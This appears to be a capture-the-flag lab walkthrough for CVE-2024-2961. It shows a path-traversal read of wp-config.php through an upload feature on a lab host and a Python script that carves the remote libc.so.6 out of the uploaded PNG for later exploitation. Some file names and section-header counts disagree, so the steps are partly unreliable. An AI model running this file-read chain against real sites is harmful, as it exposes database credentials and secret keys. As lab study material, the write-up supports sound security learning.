# python lfi.py
Remote File Read - CVE-2024-2961
Enter the path of the file you want to read (e.g., /etc/passwd): ../wp-config.php
Enter a numeric ID for the upload (e.g., 1): 1
File uploaded successfully: http://host.htb/wp-content/uploads/2025/01/1-17.png
GIF89a\nM<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
<-SNIP->
1 - On your host, find the starting offset of libc.so section headers corresponding to the same version as on the victim, here libc.so.6
# readelf -S /lib/x86_64-linux-gnu/libc.so.6
There are 64 section headers, starting at offset 0x1d4458:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
<-SNIP->
Here the starting offset is 0x1d4458
2 - Extract libc.so from png file
# cat cleanPngToElf.py
import os
import shutil
def extract_libc(png_path, output_path, start_offset, total_size):
"""
Extract libc.so.6 data from a PNG file.
"""
with open(png_path, 'rb') as png_file:
# Read the exact number of bytes for libc.so.6
png_file.seek(start_offset)
extracted_data = png_file.read(total_size)
with open(output_path, 'wb') as output_file:
output_file.write(extracted_data)
print(f"Extracted libc.so.6 data to {output_path}")
print(f"Extracted size: {len(extracted_data)} bytes")
def append_valid_section_headers(libc_path, reference_libc_path):
"""
Append valid section headers from a reference libc.so.6 to the extracted file.
"""
with open(reference_libc_path, 'rb') as ref_file:
ref_file.seek(section_headers_offset)
section_headers_data = ref_file.read(total_section_headers_size)
with open(libc_path, 'ab') as libc_file:
libc_file.write(section_headers_data)
print(f"Appended section headers from reference libc.so.6.")
# Paths to files
png_file_path = '1-22.png'
reference_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
output_libc_path = 'libc.so.7'
# Known offsets and sizes
elf_start_offset = 9 # ELF header start offset in 1-40.png
section_headers_offset = 0x1D4458 # Section headers offset in reference libc.so.6
total_section_headers_size = 60 * 64 # 60 section headers, each 64 bytes
total_size = section_headers_offset + total_section_headers_size - elf_start_offset # Full size of libc.so.6
# Step 1: Extract the main ELF data from png file
extract_libc(
png_path=png_file_path,
output_path=output_libc_path,
start_offset=elf_start_offset,
total_size=total_size
)
# Step 2: Append section headers from the reference libc.so.6
append_valid_section_headers(
libc_path=output_libc_path,
reference_libc_path=reference_libc_path
)
print(f"Fixed libc.so.6 saved to: {output_libc_path}")
# python cleanPngToElf.py .py
Extracted libc.so.6 data to libc.so.7
Extracted size: 1921871 bytes
Appended section headers from reference libc.so.6.
Fixed libc.so.6 saved to: libc.so.7
# file libc.so.7
libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82ce4e6e4ef08fa58a3535f7437bd3e592db5ac0, for GNU/Linux 3.2.0, stripped
